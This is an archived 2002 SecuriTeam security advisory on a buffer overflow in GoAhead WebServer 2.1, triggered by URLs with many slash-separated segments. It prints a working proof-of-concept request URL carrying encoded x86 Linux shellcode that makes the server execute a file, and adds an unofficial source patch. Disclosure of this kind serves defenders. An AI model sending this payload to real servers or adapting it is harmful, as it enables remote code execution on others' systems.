[NEWS] GoAhead Buffer Overflows (Multiple Slashes, Exploit)

From: support@securiteam.com
Date: 08/14/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 14 Aug 2002 17:14:43 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  GoAhead Buffer Overflows (Multiple Slashes, Exploit)
------------------------------------------------------------------------

SUMMARY

The <http://www.goahead.com/webserver/wsover.htm> GoAhead WebServer is an
open standard Web server compliant with all necessary standards to be an
effective embedded Web server. A security vulnerability in the product
allows remote attackers to cause an overflow in the program, causing it to
execute arbitrary code.

DETAILS

Vulnerable systems:
 * GoAhead Web Server version 2.1

Exploit:
A proof of concept exploit of this severe problem is attached herein. This
exploit works on an ix86 Linux machine and will cause the web server to
execute the 'sh' file in the working directory of the web server. Note
that it is quite trivial to adapt the exploit to execute any chosen
executable file on the system. To test the exploit simply point a browser
to the GoAhead web server and issue a request to the URL supplied in the
attached file exploit.txt.

http://10.0.0.3/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/
x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%
07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8
%dc%ff%ff%ffreboot

Unofficial fix:
diff -u ws212-020612/default.c ws212-020612gby/default.c
--- ws212-020612/default.c Wed Jun 12 19:38:48 2002
+++ ws212-020612gby/default.c Wed Jun 19 16:34:24 2002
@@ -204,9 +204,11 @@
  * is bad.
  */
 
+#define MAXDIRPATH (64)
+
 int websValidateUrl(webs_t wp, char_t *path)
 {
- char_t *parts[64]; /* Array of ptr's to URL parts */
+ char_t *parts[MAXDIRPATH]; /* Array of ptr's to URL parts */
   char_t *token, *dir, *lpath;
   int i, len, npart;
 
@@ -241,7 +243,11 @@
     } else if (gstrcmp(token, T(".")) != 0) {
       parts[npart] = token;
       len += gstrlen(token) + 1;
- npart++;
+ if(++npart >= MAXDIRPATH) {
+ /* Damn script kitties... */
+ bfree(B_L, path);
+ return -1;
+ }
     }
     token = gstrtok(NULL, T("/"));
   }

Vendor response:
GoAhead, makers of the GoAhead web server and Art &Logic, their support
partner were both contacted on three different occasions during the last
three months but supplied no meaningful response.

ADDITIONAL INFORMATION

The information has been provided by Anonymous.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
    ... Core Security Technologies - CoreLabs Advisory ... Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers ... Nginx Web Server. ...
    (Bugtraq)
  • [Full-disclosure] [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms
    ... Core Security Technologies - CoreLabs Advisory ... Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers ... Nginx Web Server. ...
    (Full-Disclosure)
  • Re: [Full-disclosure] server security
    ... I don't see how any can argue against the security value of such a configuration. ... It's unlikely, but you never know, you just might miss out on a nasty worm all because you werent running on a default port one day. ... This is a basic web server that runs email, web and a couple other things. ... -- Securing Apache Web Server with thawte Digital Certificate In this ...
    (Full-Disclosure)
  • RE: server security
    ... I know I have seen a plethora of 3389 automated scans and upon successful connection, attempted password attacks, what would happen if I changed to some other port? ... I am certainly not suggesting it would protect you from an Advanced Persistent Threat, but every little layer of security affords a little protection, deterrence, or delay. ... This is a basic web server that runs email, web and a couple other things. ... Digital Certificate on your Apache web server. ...
    (Security-Basics)
  • Re: [Full-disclosure] server security
    ... I don't see how any can argue against the security value of such a configuration. ... This is a basic web server that runs email, web and a couple other things. ... Certificate on your Apache web server. ... -- Securing Apache Web Server with thawte Digital Certificate In this ...
    (Full-Disclosure)